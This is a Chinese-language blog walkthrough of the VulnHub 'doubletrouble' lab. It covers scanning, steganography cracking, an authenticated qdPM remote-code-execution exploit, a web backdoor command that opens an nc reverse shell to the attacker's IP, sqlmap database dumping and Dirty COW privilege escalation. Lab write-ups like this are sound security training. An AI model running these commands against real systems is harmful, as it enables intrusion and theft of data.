首页 > 其他分享 >vulnhub靶场:doubletrouble

vulnhub靶场:doubletrouble

时间:2023-06-30 12:45:29浏览次数:44  
标签:http -- 6.89 doubletrouble 172.88 vulnhub 靶场

靶场地址:doubletrouble: 1 ~ VulnHub

kali:172.88.6.144

靶场:172.88.6.89

靶场2:172.88.6.91

arp-scan -l 

 nmap -A -sV -T4 -p- 172.88.6.89

 访问ip

 使用dirsearch对目标站点进行Web目录爬取

dirsearch -u http://172.88.6.89/ -e *

 

 

 将图片下载好,放到kali中,自行安装stegseek,输入stegseek --crack /home/kali/桌面/doubletrouble.jpg /usr/share/wordlists/rockyou.txt upfine.txt 进行破解

 打开这个文件,发现一个东东

 

[email protected]
otis666

用这个账号登录

searchsploit qdpm

searchsploit -m 50175.py

 

python3 50175.py -url http://172.88.6.89/ -u [email protected] -p otis666

 经过一系列的修改,终于好了

 

 python3 50175.py -url http://172.88.6.89/ -u [email protected] -p otis666

 

 

 这是一个漏洞

 使用nc监听反弹shell,先在kali中启动nc监听

 

172.88.6.89//uploads/users/881829-backdoor.php?cmd=nc -e /bin/bash 172.88.6.144  1234

python -c 'import pty;pty.spawn("/bin/bash")'

 

https://gtfobins.github.io/#%20awk

 

 

 

 

python3 -m http.server 8899

 

 

wget http://172.88.6.89:8899/doubletrouble.ova

 

 下载到kali中,然后复制到物理机中,用box打开,再扫描下ip就好了

 

 

 

 

sqlmap -u http://172.88.6.91/index.php -forms

 

 

sqlmap -u http://172.88.6.91/index.php --batch -forms -dbs

 

sqlmap -u http://172.88.6.91/index.php --batch -forms -D doubletrouble --tables

 

sqlmap -u http://172.88.6.91/index.php --batch -forms -D doubletrouble -T users --dump

 

 searchsploit linux 3.2

 

nc -lvnp 9999 > 40616.c

 

nc 172.88.6.91 9999 < 40616.c -w 1

gcc 40616.c -o 40616 -pthread

 

 

 这个靶场感觉有好几种打发,在获得第一个靶场的账号的时候,登录进去,上传文件,是可以进行写入一句话的,在寻找qdmp漏洞的时候也有一种打法qdPM 9.1 - Remote Code Execution (RCE) (Authenticated) - PHP webapps Exploit,在第二个靶场的ip页面的时候,是可以用burp进行抓包找sql漏洞的,脏牛提权的时候,也是有另一种打法GitHub - firefart/dirtycow: Dirty Cow exploit - CVE-2016-5195,感觉这个靶场不怎么难,就是有点麻烦,没想到里面有一个套娃靶场

参考:Vulnhub靶机-doubletrouble - 小何博客 - 博客园 (cnblogs.com)

 

标签:http,--,6.89,doubletrouble,172.88,vulnhub,靶场
From: https://www.cnblogs.com/ndy619/p/17516358.html

相关文章

  • VulnHub-DC-7渗透流程
    DC-7kali:192.168.157.131靶机:192.168.157.151信息收集nmap-sV-A-p-192.168.157.151虽然有robots.txt等敏感文件泄露但是用处不大,但在网页底部有@dc7user搜索一番,在github找到了他的项目,在config.php内得到了登录用户与密码$username="dc7user";$password="Md......
  • Vulnhub: DarkHole:1靶机
    kali:192.168.111.111靶机:192.168.111.130信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.130访问目标web网站,注册用户注册时尝试注册用户名为admin的用户,发现存在该用户进入用户后台,利用burp抓包越权修改其他用户的密码admin用户密码......
  • VulnHub_DC-6渗透流程
    DC-6kali:192.168.157.131靶机:192.168.157.150修改host文件,添加192.168.157.150wordy不然解析不了域名信息收集发现是WordPress5.1.1,探测一下用户,使用wpscan对其用户进行枚举wpscan--urlhttp://wordy/--enumerateu另存为user.txt扫一下目录找到登录界面访问http......
  • vulnhub靶场:Thales
    靶场地址:泰雷兹:1~VulnHubkali:172.88.6.144靶场:172.88.6.81 nmap172.88.6.0/24 nmap-T4-sV-P -A172.88.6.81 访问http://172.88.6.81:8080/,发现是tomcat页面,登录需要账户,所以使用msf爆破下 msfconsolesearchtomcat  useauxiliary/scanner/http/t......
  • xss漏洞攻击复现(xssgame靶场通关)
     这篇文章简单的介绍下xssgame的通关方法,从名字可以看出,xssgame就是针对xss攻击进行专门的漏洞复现,由易到难。 链接:https://pan.baidu.com/s/1F9I7iBdu7MPLLvegM5kAQg 提取码:469c 这是xssgame的安装包,将它放到phpstudy/WWW文件夹下访问即可 第一关 这一关没有任......
  • vulnhun靶场:Red.ova
    靶场下载:Red:1~VulnHubkali:172.88.6.144靶场:172.88.6.70 靶场页面是这个,第一次没有找到ip,使用桥接找到了nmap172.88.6.0/24 访问ip    找了很久没有找到有用的信息,在查看代码的时候发现了这个,直接打不开,在本地添加host   直接打开代码没有发现什......
  • Vulnhub_Broken_WP
    前言靶机下载地址-->https://www.vulnhub.com/靶机探测nmap-sn192.168.20.0/24192.168.20.140是新出现的ip详细信息扫描nmap-A-p-192.168.20.140这里可以发现nmap已经扫到了一些网站目录,一个说明文件和图片漏洞扫描nmapnmap-p22,80--script=vuln192.168.20.......
  • vulnhun靶场:jangow-01-1.0.1
    kali:172.88.6.144靶场:172.88.6.64靶场地址:Jangow:1.0.1~VulnHub 访问ip  点击右上角的buscar   写入一句话:echo'<?phpeval($_POST['shell']);?>'>upfine.php  在wordpress里面有两个文件,分别是config.php、index.html 在/var/www/html/.back......
  • vulnhub之VulnHub2018_DeRPnStiNK
    一、信息获取1、tcp开放端口获取─$cattcp_open_port.nmap#Nmap7.93scaninitiatedSatJun2416:48:232023as:nmap--min-rate10000-p--oAtcp_open_port192.168.62.198Nmapscanreportfor192.168.62.198Hostisup(0.0014slatency).Notshown:65532clos......
  • vulnhub靶机练习:01-Empire-Lupin-One
    这次用的是OracleVMVirtualBox,避免用vmware出现的问题靶机地址:https://www.vulnhub.com/entry/empire-lupinone,750/arp-scan-l  扫描ip kali:172.88.6.144靶场:172.88.6.63/1、扫描ipnmap-A-sV-T4-p-172.88.6.63 1.1尝试访问ip 1.2目录扫描    d......